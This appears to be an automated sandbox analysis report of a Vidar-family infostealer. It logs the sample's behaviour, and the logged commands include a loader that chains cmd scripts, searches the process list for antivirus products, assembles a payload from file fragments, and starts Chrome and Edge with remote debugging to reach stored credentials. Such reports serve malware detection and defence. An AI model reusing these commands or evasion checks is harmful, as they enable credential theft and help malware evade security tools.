                Source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 5F3EKF.16.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@82/297@21/16
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F741FA GetLastError,FormatMessageW,16_2_00F741FA
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F62010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00F62010
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61A0B AdjustTokenPrivileges,CloseHandle,16_2_00F61A0B
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,16_2_00F6DD87
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F73A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,16_2_00F73A0E
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\U30MZHCO.htm
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
                Source: C:\Users\user\Desktop\din.exe File created: C:\Users\user~1\AppData\Local\Temp\nsa2B2E.tmp
                Source: din.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\din.exeFile read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\din.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000015.00000002.1888343556.000036EC006F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: chrome.exe, 00000015.00000002.1886143572.000036EC00134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};6
                Source: KF3O89HVK.16.dr, EUA1N7YM7.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: din.exeVirustotal: Detection: 22%
                Source: din.exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\din.exeFile read: C:\Users\user\Desktop\din.exe
                Source: unknownProcess created: C:\Users\user\Desktop\din.exe "C:\Users\user\Desktop\din.exe"
                Source: C:\Users\user\Desktop\din.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cache" Bulgaria
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\322891\Centered.com Centered.com I
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\din.exeSection loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll, cmdext.dll, apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, sspicli.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, ntmarta.dll
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\din.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: din.exeStatic file information: File size 1224479 > 1048576
                Source: din.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: Binary string: cryptosetup.pdb source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: din.exeStatic PE information: real checksum: 0x13605c should be: 0x13af04
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20DE6 push ecx; ret 16_2_00F20DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\322891\Centered.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile created: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F926DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00F926DD
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F1FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00F1FC7C
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_16-105384
                Source: Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comDropped PE file which has not been started: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comAPI coverage: 3.7 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6DC54
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A087
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A1E2
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00F6E472
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00F7A570
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F766DC FindFirstFileW,FindNextFileW,FindClose,16_2_00F766DC
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3C622 FindFirstFileExW,16_2_00F3C622
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00F773D4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F77333 FindFirstFileW,FindClose,16_2_00F77333
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6D921
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F05FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,16_2_00F05FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: chrome.exe, 00000015.00000002.1890092613.000036EC00B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 3OHLNY.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 3OHLNY.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 3OHLNY.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: chrome.exe, 00000015.00000002.1887973658.000036EC0060C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse=Validator
                Source: msedge.exe, 0000001A.00000003.1943238674.000033FC00324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 3OHLNY.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 3OHLNY.16.drBinary or memory string: discord.comVMware20,11696492231f
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRZ/
                Source: chrome.exe, 00000015.00000002.1882634460.000002AE0D2EC000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2008867656.00000180E5C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3OHLNY.16.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 3OHLNY.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3OHLNY.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3OHLNY.16.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3OHLNY.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3OHLNY.16.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 3OHLNY.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3OHLNY.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Centered.com, 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW $
                Source: 3OHLNY.16.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3OHLNY.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3OHLNY.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=d5a0afca-8509-4b16-a2b8-6b1a28d6e6bb
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F4FF BlockInput,16_2_00F7F4FF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00F0338B
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F25058 mov eax, dword ptr fs:[00000030h]16_2_00F25058
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F620AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,16_2_00F620AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F32992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00F32992
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00F20BAF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20D45 SetUnhandledExceptionFilter,16_2_00F20D45
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00F20F91

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00F61B4D
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00F0338B
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6BBED SendInput,keybd_event,16_2_00F6BBED
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6ECD0 mouse_event,16_2_00F6ECD0
                Source: C:\Users\user\Desktop\din.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\322891\Centered.com Centered.com IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F614AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,16_2_00F614AE
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00F61FB0
                Source: Centered.com, 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp, Centered.com.2.dr, Durable.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Centered.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20A08 cpuid 16_2_00F20A08
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F5E5F4 GetLocalTime,16_2_00F5E5F4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F5E652 GetUserNameW,16_2_00F5E652
